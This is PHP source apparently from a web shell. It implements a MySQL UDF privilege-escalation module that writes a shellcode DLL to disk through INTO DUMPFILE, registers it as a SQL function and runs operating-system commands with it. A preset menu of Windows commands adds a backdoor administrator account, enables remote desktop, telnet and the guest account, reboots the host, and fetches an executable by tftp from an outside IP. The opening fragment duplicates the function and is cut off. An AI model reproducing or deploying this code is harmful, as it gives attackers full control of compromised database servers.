$sqlcmd = 'ver'; if (isset($_POST['mhost']) && isset($_POST['muser'])) { $mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport']; $mpath = File_Str($_POST['mpath']); $sqlcmd = $_POST['sqlcmd']; $conn = mysql_connect($mhost . ':' . $mport, $muser, $mpass); if ($conn) { @mysql_select_db($mdata); if (!empty($_POST['outdll']) && !empty($_POST['mpath'])) { $query = "CREATE TABLE Envl_Temp_Tab (envl BLOB);"; if (@mysql_query($query, $conn)) { $shellcode = Mysql_shellcode(); $query = "INSERT into Envl_Temp_Tab values (CONVERT(" . $shellcode . ",CHAR));"; if (@mysql_query($query, $conn)) { $query = 'SELECT envl FROM Envl_Temp_Tab INTO DUMPFILE \'' . $mpath . '\';'; if (@mysql_query($query, $conn)) { $ap = explode('/', $mpath); $inpath = array_pop($ap); $query = 'Create Function state returns string soname \'' . $inpath . '\';'; $MSG_BOX = @mysql_query($query, $conn) ? '安装DLL成功' : '安装DLL失败'; } else { $MSG_BOX = '导出DLL文件失败'; } } else { $MSG_BOX = '写入临时表失败'; } @mysql_query('DROP TABLE Envl_Temp_Tab;', $conn);
function Mysql_m() { $MSG_BOX = '先导出DLL再执行命令.MYSQL用户必须为root权限,导出路径必须能加载DLL文件.'; $info = '回显'; $mhost = 'localhost'; $muser = '******'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $mpath = 'C:/windows/mysqlDll.dll'; $sqlcmd = 'ver'; if (isset($_POST['mhost']) && isset($_POST['muser'])) { $mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport']; $mpath = File_Str($_POST['mpath']); $sqlcmd = $_POST['sqlcmd']; $conn = mysql_connect($mhost . ':' . $mport, $muser, $mpass); if ($conn) { @mysql_select_db($mdata); if (!empty($_POST['outdll']) && !empty($_POST['mpath'])) { $query = "CREATE TABLE Spider_Temp_Tab (spider BLOB);"; if (@mysql_query($query, $conn)) { $shellcode = Mysql_shellcode(); $query = "INSERT into Spider_Temp_Tab values (CONVERT(" . $shellcode . ",CHAR));"; if (@mysql_query($query, $conn)) { $query = 'SELECT spider FROM Spider_Temp_Tab INTO DUMPFILE \'' . $mpath . '\';'; if (@mysql_query($query, $conn)) { $ap = explode('/', $mpath); $inpath = array_pop($ap); $query = 'Create Function state returns string soname \'' . $inpath . '\';'; $MSG_BOX = @mysql_query($query, $conn) ? '安装DLL成功' : '安装DLL失败'; } else { $MSG_BOX = '导出DLL文件失败'; } } else { $MSG_BOX = '写入临时表失败'; } @mysql_query('DROP TABLE Spider_Temp_Tab;', $conn); } else { $MSG_BOX = '创建临时表失败'; } } if (!empty($_POST['runcmd'])) { $query = 'select state("' . $sqlcmd . '");'; $result = @mysql_query($query, $conn); if ($result) { $k = 0; $info = NULL; while ($row = @mysql_fetch_array($result)) { $infotmp .= $row[$k]; $k++; } $info = $infotmp; $MSG_BOX = '执行成功'; } else { $MSG_BOX = '执行失败'; } } } else { $MSG_BOX = '连接MYSQL失败'; } } print <<<END <script language="javascript"> function Fullm(i){ \tStr = new Array(11); \tStr[0] = "ver"; \tStr[1] = "net user silic silic /add"; \tStr[2] = "net localgroup administrators silic /add"; \tStr[3] = "net start Terminal Services"; \tStr[4] = "netstat -an"; \tStr[5] = "ipconfig"; \tStr[6] = "net user guest /active:yes"; \tStr[7] = "copy c:\\\\1.php d:\\\\2.php"; \tStr[8] = "tftp -i 123.234.222.1 get a.exe c:\\\\a.exe"; \tStr[9] = "net start telnet"; \tStr[10] = "shutdown -r -t 0"; \tmform.sqlcmd.value = Str[i]; \treturn true; } </script> <form method="POST" name="mform" id="mform" action="?s=m"> <div id="msgbox" class="msgbox">{$MSG_BOX}</div> <center><div class="actall"> 地址 <input type="text" name="mhost" value="{$mhost}" style="width:110px"> 端口 <input type="text" name="mport" value="{$mport}" style="width:110px"> 用户 <input type="text" name="muser" value="{$muser}" style="width:110px"> 密码 <input type="text" name="mpass" value="{$mpass}" style="width:110px"> 库名 <input type="text" name="mdata" value="{$mdata}" style="width:110px"> </div><div class="actall"> 可加载路径 <input type="text" name="mpath" value="{$mpath}" style="width:555px"> <input type="submit" name="outdll" value="安装DLL" style="width:80px;"></div> <div class="actall">安装成功后可用 <br><input type="text" name="sqlcmd" value="{$sqlcmd}" style="width:515px;"> <select onchange="return Fullm(options[selectedIndex].value)"> <option value="0" selected>--命令集合--</option> <option value="1">添加管理员</option> <option value="2">设为管理组</option> <option value="3">开启远程桌面</option> <option value="4">查看端口</option> <option value="5">查看IP</option> <option value="6">激活guest帐户</option> <option value="7">复制文件</option> <option value="8">ftp下载</option> <option value="9">开启telnet</option> <option value="10">重启</option> </select> <input type="submit" name="runcmd" value="执行" style="width:80px;"> <textarea style="width:720px;height:300px;">{$info}</textarea> </div></center> </form> END; return true; }